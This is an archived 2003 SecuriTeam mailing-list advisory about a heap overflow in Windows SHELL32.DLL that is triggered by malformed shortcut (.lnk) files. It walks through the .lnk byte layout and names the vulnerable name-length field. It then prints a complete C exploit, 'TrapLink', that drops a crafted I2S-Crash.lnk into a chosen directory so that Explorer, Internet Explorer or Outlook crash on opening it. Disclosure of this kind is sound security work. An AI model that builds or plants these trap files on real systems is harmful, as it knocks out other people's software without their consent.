[NT] SHELL32.DLL Denial of Service

From: SecuriTeam (support_at_securiteam.com)
Date: 12/11/03

  • Next message: SecuriTeam: "[EXPL] Ebola Username and Password Remote Exploit"
    To: list@securiteam.com
    Date: 11 Dec 2003 12:05:55 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      SHELL32.DLL Denial of Service
    ------------------------------------------------------------------------

    SUMMARY

    Attackers can turn a media (directory, drive, mail, ...) into a small
    attacking program allowing it to crash any application that would try to
    access it using SHELL32.DLL library (Explorer, IE, Outlook).

    DETAILS

    As a user browses through his hard-drive, Windows automatically analyses
    every file of the current directory, so as to allow the system to display
    the matching icon as well as file informations.

    When Windows must analyse a shortcut (*.lnk), the system determines the
    properties of the file indicated by the link using its structure (see:
    <http://www.I2S-LAB.com/Papers/The_Windows_Shortcut_File_Format.pdf> The
    Windows Shortcut File Format).

    Here is the structure of a windows link as we have understood it:
    +-------------------------------------------------------------------+
    | Shortcut HEADER |
    +-------------------------------------------------------------------+
    00000000 4C00 0000 L... 'L' Magic value

    00000004 0114 0200 .... GUID of shurtcut files
    00000008 0000 0000 ....
    00000008 C000 0000 ....
    00000010 0000 0046 ...F
       
    00000014 8900 0000 .... Flag

    00000018 2000 0000 ... File attribute

    0000001C A0C3 D5A8 .... Time 1
    00000020 478E C301 G...

    00000024 A0C3 D5A8 .... Time 2
    00000028 478E C301 G...

    0000002C A0C3 D5A8 .... Time 3
    00000030 478E C301 G...

    00000034 0000 0000 .... File length (here 0 bytes)
    00000038 0000 0000 .... Icone number (no icon for us)
    0000003C 0100 0000 .... Normal window
    00000040 0000 0000 .... shortcut (no)
    00000044 0000 0000 .... unknow/reserved
    00000048 0000 0000 .... unknow/reserved

    +-------------------------------------------------------------------+
    | Item Id List |
    +-------------------------------------------------------------------+

    0000004C 4600 F. Size of item id list

    +-------------------------------------------------------------------+
    | First item |
    +-------------------------------------------------------------------+

    0000004E 1400 .. Lenght of first item
    00000050 1F50 .P ???
    00000052 E04F D020 .O. File lenght
    00000056 EA3A 6910 .:i. ???

    +-------------------------------------------------------------------+
    | data... |
    +-------------------------------------------------------------------+

    0000005A A2D8 0800 2B30 309D 1900 2343 3A5C 0000 ....+00...#C:\..
    0000006A 0000 0000 0000 0000 0000 0000 0000 0051 ...............Q
    0000007A 8417 0032 0000 0000 0049 2F87 4B20 006B ...2.....I/.K .k
    0000008A 7574 2E74 7874 0000 ut.txt..

    +-------------------------------------------------------------------+
    | vulnerable bytes |
    +-------------------------------------------------------------------+

    00000092 0000 0900 .... name lenght
    00000096 2E00 ..

    00000098 5C00 6B00 7500 7400 2E00 7400 7800 7400 \.k.u.t...t.x.t. name in
    wide char `

    +-------------------------------------------------------------------+
    | data... |
    +-------------------------------------------------------------------+

    000000A8 6000 0000 0300 00A0 5800 0000 0000 0000 `.......X.......
    000000B8 6932 732D 7732 6B00 0000 0000 0000 0000 i2s-w2k.........
    000000C8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
    000000D8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
    000000E8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
    000000F8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
    00000108 0000 0000 00 .....

    If we modify the name length at the offset 0x92, SHELL32.DLL will cause an
    access violation error, because text was about to be written outside of
    the the buffer allocated on the heap for this operation.

    Exploit:
    /****************************************
     * TrapLink for SHELL32.DLL DoS Exploit *
     ****************************************
          Discovered & coded by I2S-LaB

     ________________________________________
     
          URL : http://www.I2S-LaB.com
          MAIL: contact[at]I2S-LaB.com
     ________________________________________

    *****************************************/

    #include <windows.h>

    void main (int argc, char *argv[])
    {

    HANDLE TrapFile;
    DWORD NumberOfBytesWritten;
    unsigned char LnkCrash[] =

      "\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00"
      "\x00\x00\x00\x46\x89\x00\x00\x00\x20\x00\x00\x00\xA0\xC3\xD5\xA8"
      "\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8"
      "\x47\x8E\xC3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x00\x14\x00"
      "\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30"
      "\x30\x9D\x19\x00\x23\x43\x3A\x5C\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x84\x17\x00\x32\x00\x00"
      "\x00\x00\x00\x49\x2F\x87\x4B\x20\x00\x6B\x75\x74\x2E\x74\x78\x74"
      "\x00\x00\xFF\xFF\x09\x00\x2E\x00\x5C\x00\x6B\x00\x75\x00\x74\x00"
      "\x2E\x00\x74\x00\x78\x00\x74\x00\x60\x00\x00\x00\x03\x00\x00\xA0"
      "\x58\x00\x00\x00\x00\x00\x00\x00\x69\x32\x73\x2D\x77\x32\x6B\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
      "\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
      "\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
      "\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
      "\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x00\x00\x00\x00";

      printf ("################################\n"
        "TrapLink SHELL32.dll DoS exploit\n"
        "################################\n"
        "By I2S-LAB Team.\n\n"
        "http://www.I2S-LaB.com\n\n" );

      if (!argv[1])
        printf ("Usage : TrapLink <path to trap>\n", argv[0]);

      else
      {
        if ( !SetCurrentDirectory(argv[1]) )
          printf ("Error : %s is not a valid directory to trap\n", argv[1] );
        else
        {
          TrapFile = CreateFile("I2S-Crash.lnk",
            GENERIC_WRITE, 0,
            NULL, CREATE_ALWAYS,
            FILE_ATTRIBUTE_NORMAL, NULL );

          if (TrapFile == INVALID_HANDLE_VALUE)
            printf ("Error : cannot create malicious file.\n");

          else
          {
            WriteFile (TrapFile, LnkCrash, sizeof (LnkCrash),
    &NumberOfBytesWritten, NULL);
            printf ("%s is now trapped with a malicious LNK file\n", argv[1]
    );
          }
        }
      }
    }

    Solution:
    Microsoft was notified on 11/17/2003 and are planning on getting this
    fixed as part of the next service pack.

    ADDITIONAL INFORMATION

    The information has been provided by Aurélien BOUDOUX and Fred CHAVEROT
    <mailto:contact@i2s-lab.com> i2s-lab.com.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] Ebola Username and Password Remote Exploit"

    Relevant Pages

    • [NT] Windows Embedded Open Type (EOT) Font Heap Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in the way that Windows uncompresses Embedded Open Type ... fonts allow the author of a malicious web page to execute arbitrary code ... A heap overflow vulnerability exists in T2EMBED.DLL, ...
      (Securiteam)
    • [NT] Windows VDM #UD Local Privilege Escalation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... vulnerability to fully compromise a Windows NT 4.0, Windows 2000, Windows ... 32-bit VDM "host" code, and the invalid opcode fault handler within the ... process).The kernel does not validate the address to which execution is ...
      (Securiteam)
    • [NT] Microsoft Windows Color Management Module Heap Buffer Overflow Vulnerability (MS08-046)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Windows Color Management Module Heap Buffer Overflow ... vulnerability in multiple versions of Microsoft Corp.'s Windows operating ... Keep in mind that this only blocks the attack vector through Windows ...
      (Securiteam)
    • [NT] Windows Workstation Service Remote Buffer Overflow (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Windows Workstation Creates and maintains client network connections ... the log file. ... The string arguments for this logging function are supplied as ...
      (Securiteam)
    • [REVS] Removing about:blank Homepage Hijacker
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... expanded with almost a dozen other checks against hijacker tricks. ... To Remove "About:Blank" Hijacker Adware In Windows XP Home edition Service ... The "value" window reveals the hidden file name. ...
      (Securiteam)